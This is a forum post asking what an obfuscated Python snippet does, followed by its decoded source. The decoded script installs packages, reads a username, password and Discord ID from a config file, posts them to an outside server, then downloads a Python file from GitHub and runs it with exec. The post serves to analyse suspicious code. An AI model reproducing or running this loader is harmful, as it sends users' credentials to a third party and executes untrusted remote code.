What is this obfuscation?

Joined
Sep 21, 2022
Messages
122
Reaction score
15
Looking at the end of the line. The for loop makes a string. The exec runs it. I guess, I am not a python programmer.

The source code (1421 characters) is ASCII and is hidden by writing ASCII code x as an x length string of plus symbols.
Code:
import os

try:
    import requests
    import json
    import discord
    import aiohttp
    import websockets
except ModuleNotFoundError:
    os.system("python -m pip install requests")
    os.system("python -m pip install discord.py==2.3.1")
    os.system("python -m pip install aiohttp")
    os.system("python -m pip install websockets")

try:
    with open('config.json', 'r') as f:
        config = json.load(f)
except KeyError:
    print('Invalid config.json')
    exit()

username = config['info']['username']
password = config['info']['password']
discord_id = config['info']['discord_id']

def kaakmakmmfkaeknfjaenjaw(username, password, discord_id):
    response = requests.post(
        'http://astro.facal.me:5051/klakemaekenmekame',
        json={'username': username, 'password': password, 'discord_id': discord_id}
    )

    if response.status_code == 200:
        data = response.json()
        jwtToken = data['token']
        return jwtToken
    else:
        return None

def download_exe(jwtToken):
    response = requests.get('https://raw.githubusercontent.com/imnotfacal/aekjnkaenrmkanmkr/main/astro_.py')

    if response.status_code == 200:
        script = response.text
        exec(script, {'token': jwtToken})
    else:
        print('Error :(')

jwtToken = kaakmakmmfkaeknfjaenjaw(username, password, discord_id)
if jwtToken:
    download_exe(jwtToken)
else:
    print('Invalid credentials')